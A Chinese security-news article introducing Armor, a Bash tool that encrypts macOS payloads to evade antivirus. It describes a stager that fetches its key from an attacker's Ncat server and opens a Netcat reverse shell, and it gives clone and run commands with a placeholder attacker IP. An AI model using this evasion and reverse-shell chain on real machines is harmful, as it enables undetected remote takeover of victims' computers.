Armor:一款功能强大的macOS Payload加密工具,可绕过大部分AV

前言

今天给大家介绍的是一款名叫Armor的macOS Payload加密工具,Armor是一个功能强大的Bash脚本,通过它来创建的加密macOS Payload能够绕过反病毒扫描工具。

Armor

微信扫码咨询

Armor介绍

Armor可以直接配合NetcatPayload一起使用,Netcat监听器的目标端口为4444,读取了“payload.txt”文件之后,我们会看到文件内容包含了Bash代码,执行之后,将会在目标macOS系统和攻击者的Netcat监听器之间建立一条TCP连接。Armor可以用来对Bash脚本的代码进行加密,Ncat可以用来在攻击者的服务器端托管解密密钥。当Stager在目标macOS系统上执行之后,bash代码会被解密并执行,整个过程不会在磁盘中存储任何数据。接下来,当解密密钥被使用之后,Ncat会终止监听器的运行。当Netcat链接建立成功之后,攻击者就可以获取到目标macOS系统的远程访问权了。

当然了,很多同学会认为对macOS Payload进行加密纯属多余,因为这种特殊的Bash脚本本来就能够绕过反病毒引擎。。但是我们这里只是举个例子,因为同等程度地代码混淆和加密还可以应用到很多复杂的Python、Ruby和Shell脚本身上。

工具安装

Armor使用了LibreSSL来加密输入的文件,并创建SSL证书。如果你的设备上没有安装LibreSSL的话,Armor会自动帮你安装它。这个功能的相关代码可以在armor.sh文件中找到。除了LibreSSL之外,依赖组件还包括Ncat在内,在Kali上大家可以使用下列命令完成安装:

$apt-get update && apt-get install nmap

Armor工具的代码克隆以及执行命令如下:

git clone https://github.com/tokyoneon/Armor

cd Armor/

chmod +x armor.sh

./armor.sh /path/to/payload.txt 1.2.3.4 443

其中,1.2.3.4是攻击者的IP地址,解密密钥就托管在这个服务器上,它可以是一个本地IP或者VPS服务器,443为服务器端口号,大家可以根据自己的需要来自行定义。

项目地址

Armor:【GitHub传送门

* 参考来源:Armor,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

https://www.freebuf.com/sectool/190620.html

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: